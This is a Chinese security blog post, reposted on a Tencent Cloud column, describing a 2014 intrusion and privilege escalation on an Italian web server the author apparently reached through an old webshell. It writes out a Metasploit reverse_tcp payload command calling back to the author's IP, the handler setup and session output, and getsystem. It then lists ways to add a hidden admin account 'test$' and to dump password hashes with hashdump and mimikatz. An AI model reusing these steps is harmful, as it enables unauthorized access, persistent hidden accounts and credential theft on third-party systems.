前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >记一次提权添加管理员实战案例

记一次提权添加管理员实战案例

作者头像
潇湘信安
发布2021-01-12 14:16:53
7700
发布2021-01-12 14:16:53
举报
文章被收录于专栏:潇湘信安

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持 #防护绕过 #内网安全 #实战案例#其他笔记 #资源分享 #MSF

0x01 前言

这个案例记录的是笔者2014年测试的一台服务器,闲着无聊之时在“中国菜刀”上找了一个以前的意大利站点做测试,这是很久以前的站了,都忘了有没有提权过了,试了下刚放出来的CVE-2014-4113都失败了,执行后无回显。

0x02 实战提权过程

首先我们先利用Metasploit的msfpayload命令生成一个普通的exe载荷上传至目标可读写目录中,配置好监听模块的相关参数,然后执行即可得到一个普通权限的会话。

代码语言:javascript
复制
msfpayload windows/meterpreter/reverse_tcp lhost=1*3.2*1.*7.*7 lport=7777 X > /media/sf_系统学习/test.exe

注:这里提一下为什么我们生成载荷时填的公网IP,而在配置监听模块时填的内网IP?那是因为当时是用本地局域网的kali进行测试的,最后是用路由器的端口映射功能将Kali的7777端口映射出来的。

代码语言:javascript
复制
msf > use exploit/multi/handler 
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.4
msf exploit(handler) > set LPORT 7777
msf exploit(handler) > exploit 

[*] Started reverse handler on 192.168.1.4:7777 
[*] Starting the payload handler...
[*] Sending stage (770048 bytes) to 6*.7*.2*3.5*
[*] Meterpreter session 6 opened (192.168.1.4:7777 -> 6*.7*.2*3.5*:2446) at 2014-10-26

习惯性的先执行了下getsystem命令居然成功将权限提升至SYSTEM,接着测试了下其它命令,当我们测试到shell命令时发现虽然已经进入到命令终端了,但是依旧为zorro\iwam_server普通权限。

通过Google搜索看到Hak5安全社区中有人也提到过类似问题,解决办法大概意思就是说我们需要先将当前会话的进程迁移至Admin/System权限运行的进程上去,然后才能有权限添加管理员用户。

  • https://forums.hak5.org/index.php?/topic/26576-adding-new-user-in-windows-from-a-meterpreter-shell/
代码语言:javascript
复制
Before meterpreter will drop into a shell with system privileges, it first has to migrate to a process with system privs. If you drop directly in like I was doing you'll have whatever privs the browser was running with. 

After the migration to a process with sys/admin privs, if you drop into a shell you'll have sys privs.

目前因权限不够而暂时无法直接在命令终端添加管理员用户,那么还有什么方法可以添加管理员用户或者得到目标管理员的密码呢?这里笔者另外提供几种思路,仅供参考,1-2断开会话,3-5已成功!

(1) run getgui -u test$ -p 123456(添加管理员)

(2) migrate 3760(迁移到system运行的进程)

(3) use incognito(加载incognito扩展)

(4) hashdump(获取系统hash值并破解)

(5) 其它方法,如:mimikatz扩展、smart_hashdump模块等方法

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-01-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 潇湘信安 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
相关产品与服务
云服务器
云服务器(Cloud Virtual Machine,CVM)提供安全可靠的弹性计算服务。 您可以实时扩展或缩减计算资源,适应变化的业务需求,并只需按实际使用的资源计费。使用 CVM 可以极大降低您的软硬件采购成本,简化 IT 运维工作。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档